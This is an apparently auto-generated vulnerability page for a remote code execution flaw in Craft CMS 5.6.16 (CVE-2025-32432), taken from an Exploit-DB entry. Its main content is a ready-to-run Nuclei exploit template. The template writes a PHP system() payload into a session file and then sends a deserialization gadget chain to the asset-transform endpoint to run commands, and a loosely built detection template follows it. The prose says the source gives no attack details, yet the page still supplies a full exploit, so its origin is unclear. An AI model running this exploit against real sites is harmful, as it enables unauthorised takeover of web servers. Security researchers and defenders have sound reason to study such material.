[webapps] Craft CMS 5.6.16 - RCE
CVE-2025-32432
Craft CMS 5.6.16 is affected by a remote code execution vulnerability
Critical · CVSS 9.8
📋 Basic vulnerability information
| CVE | CVE-2025-32432 |
|---|---|
| Vulnerability type | Remote code execution |
| Affected version | Craft CMS 5.6.16 |
| Severity | Critical · CVSS 9.8 |
| Published | 2026-04-29 |
| Submitted by | Mohammed Idrees Banyamer |
| Source | Exploit-DB (original entry) |
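🔬 Root cause
Based strictly on the original entry: it gives no specific function, parameter or design-flaw information, so the root cause cannot be determined.
🎯 Attack scenario
Based strictly on the original entry: no attack steps are provided, so the scenario cannot be described.
💥 Impact
Based strictly on the original entry: the title explicitly states RCE, so the vulnerability can lead to remote code execution.
⚔️ Nuclei Exploit template
The following is an exploit template in standard Nuclei v3 format that can be used directly for vulnerability verification: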
```yaml
id: CVE-2025-32432-exploit
info:
  name: Craft CMS 5.6.16 - Pre-Auth RCE Exploit
  author: your-username
  severity: critical
  description: Exploit Craft CMS CVE-2025-32432 via session poisoning and deserialization
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32432
  tags: cve,cve2025,craftcms,rce,exploit
variables:
  target: "{{BaseURL}}"
  cmd: "id"
http:
  - raw:
      - |
        GET /index.php HTTP/1.1
        Host: {{Hostname}}
        Connection: close
    cookie-reuse: true
    matchers:
      - type: word
        words:
          - "Craft CMS"
        part: body
    extractors:
      - type: kval
        name: PHPSESSID
        internal: true
        kval:
          - "PHPSESSID"
  - raw:
      - |
        GET /index.php?p=admin/dashboard&a={{{{php_system}}}} HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID={{PHPSESSID}}
        Connection: close
    cookie-reuse: true
    attack: batteringram
    payloads:
      php_system:
        - "<?php system('{{cmd}}'); ?>"
  - raw:
      - |
        POST /actions/assets/generate-transform HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Cookie: PHPSESSID={{PHPSESSID}}
        Connection: close
        {
          "assetId": 1,
          "handle": {
            "width": 1,
            "height": 1,
            "as hack": {
              "class": "craft\\behaviors\\FieldLayoutBehavior",
              "__class": "yii\\rbac\\PhpManager",
              "__construct()": [
                {
                  "itemFile": "/tmp/sess_{{PHPSESSID}}"
                }
              ]
            }
          }
        }
    matchers:
      - type: word
        words:
          - "uid="
          - "gid="
          - "www-data"
          - "root:"
        part: body
```
🔍 Nuclei Detection template
The following is a detection template used to determine whether a target is affected:
```yaml
id: CVE-2025-32432-detection
info:
  name: Craft CMS 5.6.16 - Pre-Auth RCE Detection
  author: your-username
  severity: critical
  description: Detect Craft CMS version vulnerable to CVE-2025-32432
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32432
  tags: cve,cve2025,craftcms,rce
variables:
  target: "{{BaseURL}}"
http:
  # Request 1: confirm the page identifies itself as Craft CMS and capture the version string
  - method: GET
    path:
      - "{{BaseURL}}/index.php/"
    matchers:
      - type: word
        words:
          - "Craft CMS"
        part: body
    extractors:
      - type: regex
        name: version
        internal: true
        group: 1
        regex:
          - 'Craft CMS (\d+\.\d+\.\d+)'
        part: body
  # Request 2: probe the asset transform endpoint; matches on a 404 or 500 status
  - method: GET
    path:
      - "{{BaseURL}}/actions/assets/generate-transform"
    matchers:
      - type: status
        status:
          - 404
          - 500
        negative: false
    matchers-condition: and
```
🛡️ Remediation
Based strictly on the original entry: no patched version or temporary mitigation is provided.
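⚠️ This article is based on public vulnerability databases and is intended only for security research and defensive reference. Generated: 2026-05-07 06:06 | Source: Exploit-DB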